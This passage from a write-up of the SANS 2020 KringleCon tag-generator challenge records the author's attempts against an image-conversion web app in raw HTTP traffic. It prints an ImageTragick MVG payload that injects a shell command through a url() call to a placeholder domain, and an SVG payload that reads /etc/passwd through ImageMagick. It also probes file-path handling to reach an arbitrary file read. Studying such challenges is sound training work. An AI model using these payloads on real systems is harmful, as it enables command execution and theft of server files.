&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 13:56:32 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1705&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

PNG[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The behaviour of this download functionality is strange. For example, if we
had any number of leading forward slash, the file is still downloaded:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/image?id=////eba003cc-5221-454e-87d7-ffc484d29872.png&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/webp,*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 13:58:45 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1705&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

PNG[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Also, any text after a &lt;code&gt;;&lt;/code&gt; seems to be ignored:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/image?id=eba003cc-5221-454e-87d7-ffc484d29872.png;test&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/webp,*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 14:00:34 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1705&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

PNG[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;All this behaviour points to an arbitrary file read. &lt;strong&gt;And that's exactly what
it is!&lt;/strong&gt; &lt;em&gt;That's&lt;/em&gt; the right solution! But is that the trail I decided to
folllow? Noooooo, of course not! Because I noticed that my original PNG file
had been &lt;em&gt;converted&lt;/em&gt;, from an interlaced PNG to a non-interlaced PNG:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; file sans_logo.png eba003cc-5221-454e-87d7-ffc484d29872.png
&lt;span class="go"&gt;sans_logo.png:                            PNG image data, 122 x 62, 8-bit colormap, interlaced&lt;/span&gt;
&lt;span class="go"&gt;eba003cc-5221-454e-87d7-ffc484d29872.png: PNG image data, 122 x 62, 8-bit colormap, non-interlaced&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I searched how an interlaced PNG is converted to a non-interlaced PNG, and
found &lt;a class="reference external" href="https://stackoverflow.com/questions/19742548/how-to-de-interlace-png-files"&gt;this StackOverflow post&lt;/a&gt;
that says it can be done with &lt;em&gt;ImageMagick&lt;/em&gt;. And then I could hear bells
ringing in my head. I thought I'd hit the jackpot.&lt;/p&gt;
&lt;p&gt;Couple of years ago, &lt;a class="reference external" href="https://imagetragick.com/"&gt;many vulnerabilities&lt;/a&gt; had
been discovered in ImageMagick, allowing stuff from local file read, file
deletion, SSRF, or even RCE.&lt;/p&gt;
&lt;p&gt;Even if the Debian version was recent, I thought that maybe a vulnerable
ImageMagick version had been installed on purpose.&lt;/p&gt;
&lt;p&gt;So I tried the &lt;code&gt;exploit.mvg&lt;/code&gt; example given in the ImageTragick website
linked earlier:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
push graphic-context
viewbox 0 0 640 480
fill 'url(https://my_super_duper_domain.com/image.jpg&amp;quot;;|ls &amp;quot;-la)'
pop graphic-context
&lt;/pre&gt;
&lt;p&gt;I then tried to upload my &lt;code&gt;exploit.mvg&lt;/code&gt; file, but got that message:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Error in /app/lib/app.rb: Unsupported file type: /tmp/RackMultipart20201230-1-hpltx4.mvg
&lt;/pre&gt;
&lt;p&gt;Hmm, apparently our file is put in a temporary file with the same extension.
And the &lt;code&gt;.mvg&lt;/code&gt; does not seem to be supported. What about SVG files?&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Error in /app/lib/app.rb: Unsupported file type: /tmp/RackMultipart20201230-1-snhqi4.svg
&lt;/pre&gt;
&lt;p&gt;Nope, same error. But then, I noticed that the &lt;code&gt;convert&lt;/code&gt; program from
ImageMagick performs image identification, whatever the extension of the
input file. So, if I create an SVG file with a &lt;code&gt;.png&lt;/code&gt; extension, it
should be accepted by the website, and still be treated as an SVG file by
&lt;code&gt;convert&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let's upload a simple SVG file, with a &lt;code&gt;.png&lt;/code&gt; extension:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------4039698011180393282902452814&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;423&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;

-----------------------------4039698011180393282902452814
Content-Disposition: form-data; name=&amp;quot;my_file[]&amp;quot;; filename=&amp;quot;red_circle_svg.png&amp;quot;
Content-Type: image/png

&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;svg xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; width=&amp;quot;200&amp;quot; height=&amp;quot;200&amp;quot;&amp;gt;
&amp;lt;circle cx=&amp;quot;100&amp;quot; cy=&amp;quot;100&amp;quot; r=&amp;quot;88&amp;quot; fill=&amp;quot;none&amp;quot; stroke=&amp;quot;#fd0000&amp;quot; stroke-width=&amp;quot;15&amp;quot;/&amp;gt;
&amp;lt;/svg&amp;gt;

-----------------------------4039698011180393282902452814--
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And it worked:&lt;/p&gt;
&lt;img alt="tag_generator_red_circle.png" class="align-center" src="/images/sans-christmas-challenge-2020/tag_generator_red_circle.png" /&gt;
&lt;p&gt;So, we can force ImageMagick to process SVG files. SVG files are interesting
because you can reference outside files that should be included in the final
image, including text file. For example, the following SVG file will create
an image with the content of &lt;code&gt;/etc/passwd&lt;/code&gt; once converted:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&amp;lt;svg width=&amp;quot;600&amp;quot; height=&amp;quot;600&amp;quot; xmlns:xlink=&amp;quot;http://www.w3.org/1999/xlink&amp;quot; xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot;&amp;gt;
    &amp;lt;image href=&amp;quot;text:/etc/passwd&amp;quot; height=&amp;quot;500&amp;quot; width=&amp;quot;500&amp;quot;/&amp;gt;
&amp;lt;/svg&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's an example on my Kali virtual machine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; convert etc_passwd.svg etc_passwd.png
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="etc_passwd.png" class="align-center" src="/images/sans-christmas-challenge-2020/etc_passwd.png" /&gt;
&lt;p&gt;I submitted confidently my new payload on the server, and... nothing. The
website rendered a white PNG file. I thought that maybe the server was running
in a &lt;code&gt;chroot&lt;/code&gt;-ed environment, and that it didn't have access to
&lt;code&gt;/etc/passwd&lt;/code&gt;. So I tried with other files, such as,
&lt;code&gt;/proc/self/environ&lt;/code&gt;, or the Ruby file we discovered earlier,
&lt;code&gt;/app/lib/app.rb&lt;/code&gt;, but nothing worked.&lt;/p&gt;
&lt;p&gt;I then thought that maybe, an SVG file was not the best format to carry my
payload. So I took a look at &lt;a class="reference external" href="https://imagemagick.org/script/formats.php"&gt;the different formats that ImageMagick supports&lt;/a&gt; to see if one would suit my
plans better. There was the &lt;a class="reference external" href="https://imagemagick.org/script/magick-vector-graphics.php"&gt;MVG&lt;/a&gt;
we tried earlier, but also the &lt;a class="reference external" href="https://imagemagick.org/script/conjure.php"&gt;MSL&lt;/a&gt;
(or Magick Scripting Language) format, but nothing seemed to work...&lt;/p&gt;
&lt;p&gt;I then found new attacks against ImageMagick, discovered by &lt;a class="reference external" href="https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html"&gt;Alex Inführ&lt;/a&gt;,
which can lead to remote code execution under special circumstances. However,
these techniques were published in November 2020, and since KringleCon
challenges are years in the making, it was pretty unlikely that this was the
method the organizers had in mind (I tried anyway, but it didn't work).&lt;/p&gt;
&lt;p&gt;After that, I decided that maybe the ImageMagick trail wasn't the one to
follow. But, instead of backtracking to the local file include we mentioned
earlier, &lt;strong&gt;I decided to search for yet another trail!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The tag generator is coded in JavaScript, in the &lt;a class="reference external" href="https://tag-generator.kringlecastle.com/js/app.js"&gt;https://tag-generator.kringlecastle.com/js/app.js&lt;/a&gt;
file. By looking at the code, I saw that a sharing functionality was present,
even if no share button was rendered in the application:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.shareBtn&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;click&lt;/span&gt;&lt;span class="p"&gt;(()&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;dataURL&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;canvas&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toDataURL&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;width&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;canvas&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;width&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;height&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;canvas&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;height&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;left&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;top&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;format&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ajax&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/save&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;dataType&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;contentType&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;application/json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;dataURL&lt;/span&gt; &lt;span class="p"&gt;}),&lt;/span&gt;
    &lt;span class="nx"&gt;success&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sb"&gt;`/share?id=&lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I thought I'd found my winning ticket &lt;strong&gt;again&lt;/strong&gt;. So I forcefully called this
functionality from the JavaScript console, and interacted with the two new
endpoints, &lt;code&gt;/save&lt;/code&gt; and &lt;code&gt;/share&lt;/code&gt;. The first one sends a
base64-encoded PNG file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/save&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json, text/javascript, */*; q=0.01&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;50668&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;dataURL&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEU[snip]&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The server responds with an id that we can use with the &lt;code&gt;/share&lt;/code&gt;
endpoint:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
